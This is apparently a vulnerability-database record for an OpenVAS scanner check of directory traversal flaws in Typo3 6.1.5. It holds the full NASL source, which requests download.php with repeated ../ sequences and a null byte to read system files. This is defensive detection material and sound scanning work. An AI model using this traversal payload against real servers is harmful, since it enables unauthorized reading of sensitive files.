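This host is running Typo3 and is prone to multiple directory traversal
vulnerabilities. According to the embedded plugin, user-supplied input in
the 'file' and 'path' parameters is not properly validated, so ../ (dot dot)
sequences can be used to read arbitrary files; Typo3 version 6.1.5 and
probably earlier are listed as affected. The plugin itself rates the issue
CVSS 5.0 (AV:N/AC:L/Au:N/C:P/I:N/A:N), so the record-level score of
0.0 / NONE should not be read as "no risk". The solution type is WillNotFix:
the plugin's general options are to upgrade to a newer release, disable the
respective features, or remove or replace the product.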
{"id": "OPENVAS:1361412562310803776", "type": "openvas", "bulletinFamily": "scanner", "title": "Typo3 Multiple Directory Traversal Vulnerabilities", "description": "This host is running Typo3 and is prone to multiple directory traversal\nvulnerabilities.", "published": "2013-11-20T00:00:00", "modified": "2018-09-15T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310803776", "reporter": "Copyright (C) 2013 Greenbone Networks GmbH", "references": ["http://www.exploit-db.com/exploits/29355", "http://exploitsdownload.com/exploit/php/typo3-directory-traversal-vulnerability"], "cvelist": [], "lastseen": "2018-09-17T13:38:52", "viewCount": 2, "enchantments": {"score": {"value": 0.4, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.4}, "pluginID": "1361412562310803776", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_typo3_multiple_dir_trav_vuln.nasl 11401 2018-09-15 08:45:50Z cfischer $\n#\n# Typo3 Multiple Directory Traversal Vulnerabilities\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:typo3:typo3\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.803776\");\n script_version(\"$Revision: 11401 $\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-15 10:45:50 +0200 (Sat, 15 Sep 2018) $\");\n script_tag(name:\"creation_date\", value:\"2013-11-20 11:33:55 +0530 (Wed, 20 Nov 2013)\");\n script_name(\"Typo3 Multiple Directory Traversal Vulnerabilities\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation may allow an attacker to obtain sensitive information,\nwhich can lead to launching further attacks.\");\n script_tag(name:\"affected\", value:\"Typo3 version 6.1.5 and probably before.\");\n script_tag(name:\"insight\", value:\"Multiple flaws are due to improper validation of user-supplied input via\n'file' and 'path' parameters, which allows attackers to read arbitrary files\nvia a ../(dot dot) sequences.\");\n script_tag(name:\"solution\", value:\"No known solution was made available for at least one year since the disclosure of this vulnerability. Likely none will be provided anymore. 
General solution options are to upgrade to a newer release, disable respective features, remove the product or replace the product by another one.\");\n script_tag(name:\"vuldetect\", value:\"Send a crafted exploit string via HTTP GET request and check whether it\nis able to read the system file or not.\");\n script_tag(name:\"summary\", value:\"This host is running Typo3 and is prone to multiple directory traversal\nvulnerabilities.\");\n script_tag(name:\"solution_type\", value:\"WillNotFix\");\n\n script_xref(name:\"URL\", value:\"http://www.exploit-db.com/exploits/29355\");\n script_xref(name:\"URL\", value:\"http://exploitsdownload.com/exploit/php/typo3-directory-traversal-vulnerability\");\n script_category(ACT_ATTACK);\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n script_copyright(\"Copyright (C) 2013 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_typo3_detect.nasl\", \"os_detection.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_mandatory_keys(\"TYPO3/installed\");\n\n exit(0);\n}\n\ninclude(\"misc_func.inc\");\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\ninclude(\"host_details.inc\");\n\n\nif( ! port = get_app_port( cpe:CPE ) ) exit( 0 );\nif( ! dir = get_app_location( cpe:CPE, port:port ) ) exit( 0 );\n\nfiles = traversal_files();\n\nforeach file (keys(files))\n{\n url = dir + \"/fileadmin/scripts/download.php?path=\" +\n crap(data:\"../\", length:3*15) + files[file] + \"%00\";\n\n if(http_vuln_check(port:port, url:url, pattern:file))\n {\n security_message(port:port);\n exit(0);\n }\n}\n\nexit(99);\n", "naslFamily": "Web application abuses", "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1647321575, "score": 1659775931}}